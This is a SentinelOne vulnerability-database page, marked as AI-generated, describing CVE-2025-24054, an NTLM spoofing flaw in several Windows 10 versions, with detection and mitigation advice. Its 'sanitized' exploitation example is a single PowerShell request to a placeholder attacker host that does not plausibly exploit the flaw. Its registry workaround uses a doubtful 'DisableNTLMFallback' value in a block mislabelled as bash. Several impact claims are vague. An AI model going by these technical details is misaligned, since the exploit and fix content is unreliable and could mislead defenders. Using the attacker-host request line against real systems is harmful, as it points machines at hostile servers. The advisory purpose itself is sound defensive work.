SentinelOne
CVE Vulnerability Database
Vulnerability Database/CVE-2025-24054

CVE-2025-24054: Windows 10 1507 Path Traversal Flaw

CVE-2025-24054 is a path traversal vulnerability in Windows 10 1507 NTLM that enables unauthorized attackers to perform spoofing attacks over a network. This article covers technical details, affected versions, and mitigation.

Updated:

CVE-2025-24054 Overview

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

Critical Impact

This vulnerability enables attackers to perform spoofing, potentially leading to unauthorized command execution and data breaches across various Windows environments. It is especially critical as it is known to be exploited in the wild.

Affected Products

  • Microsoft Windows 10 1507
  • Microsoft Windows 10 1607
  • Microsoft Windows 10 1809

Discovery Timeline

  • Not Available - Vulnerability discovered by Not Available
  • Not Available - Responsible disclosure to microsoft
  • Not Available - CVE-2025-24054 assigned
  • Not Available - microsoft releases security patch
  • 2025-03-11 - CVE-2025-24054 published to NVD
  • 2025-10-27 - Last updated in NVD database

Technical Details for CVE-2025-24054

Vulnerability Analysis

The vulnerability arises from improper validation of file paths within the NTLM authentication mechanism on the affected Windows platforms. This flaw enables an attacker to manipulate file paths remotely, potentially leading to arbitrary file manipulation or spoofing.

Root Cause

The root cause of the vulnerability is improper input validation of file name or path in the NTLM service.

Attack Vector

The attack vector is over a network where an attacker can exploit this flaw to perform spoofing without prior authentication.

powershell
# Example exploitation code (sanitized)
Invoke-WebRequest -Uri "http://malicious.site/malicious_path" -UseBasicParsing

Detection Methods for CVE-2025-24054

Indicators of Compromise

  • Unexpected outbound NTLM traffic
  • Unusual file access logs
  • NTLM authentication failures

Detection Strategies

Security teams should leverage network monitoring to identify unexpected NTLM traffic and analyze authentication failures to detect possible exploitation attempts.

Monitoring Recommendations

Implement continuous monitoring of NTLM authentication logs and network traffic using SentinelOne’s agent to ensure early detection of abnormal activities related to this vulnerability.

How to Mitigate CVE-2025-24054

Immediate Actions Required

  • Disable NTLM in environments where it is not required
  • Enable strict authentication mechanisms
  • Monitor NTLM traffic for anomalies

Patch Information

Microsoft has released patches for affected systems. Administrators are strongly advised to apply these updates immediately to reduce exposure.

Workarounds

A potential workaround is disabling NTLM fallback mechanisms in configuration settings. This step should only be taken after verifying compatibility with current applications.

bash
# Configuration example
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' "DisableNTLMFallback" -Type DWord -Value 1

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne